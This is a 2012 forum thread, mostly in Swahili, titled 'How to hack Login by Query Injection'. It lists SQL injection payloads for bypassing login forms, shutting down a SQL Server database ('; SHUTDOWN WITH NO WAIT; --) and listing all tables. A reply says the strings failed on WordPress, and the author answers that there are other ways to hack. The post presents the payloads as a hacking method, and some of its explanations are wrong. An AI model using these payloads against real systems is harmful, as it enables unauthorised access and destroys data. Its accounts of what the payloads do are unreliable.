Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

How to hack Login by Query Injection.

Discussion in 'Tech, Gadgets & Science Forum' started by Annael, Aug 22, 2012.

  1. Annael

    Annael JF-Expert Member

    #1
    Aug 22, 2012
    Joined: Sep 26, 2011
    Messages: 6,149
    Likes Received: 1,999
    Trophy Points: 280
    Many application developer they forget query injection problem.
    Hapa chini ni njia ya kutest kama sehemu ya kulogin au kuingiza data kwenye system yeyote iko secured.

    kwa mfano kwenye login.

    ' AND 1=1-- Hii inafanaya kuchukua taarifa zote ziliko kwenye database kwenye table hiyo.

    Hapa ni kwenye SQL SERVER:-

    '; SHUTDOWN WITH NO WAIT; --
    Hizi code zina zima database server kama mtu ametumia query injection.

    '; SELECT * FROM sys.tables;-- hii ina display table zote kwenye database.

    NB: Kama unajua database design this is it. Hii issue inaweza ukalogin bila hata kutumia hata user ID
    eg kwenye PHP mySQL Kwneye kibox cha user ID unaandika hivi

    ' OR 2=2 );--
    au
    ' OR 2=2;--
     
  2. alphoncetz

    alphoncetz JF-Expert Member

    #2
    Aug 22, 2012
    Joined: May 1, 2011
    Messages: 283
    Likes Received: 0
    Trophy Points: 33
    Have tried loging in to WordPress using ' OR 2=2 );-- then ' OR 2=2;-- ALL didn't work out
    What PHP with MySQL script can the codes bypass login entries?
     
  3. Annael

    Annael JF-Expert Member

    #3
    Aug 22, 2012
    Joined: Sep 26, 2011
    Messages: 6,149
    Likes Received: 1,999
    Trophy Points: 280
    I said when a programmer make Mistake and allow Query Injection. But if he do not make mistake so its good you can use other way to hack
     
Loading...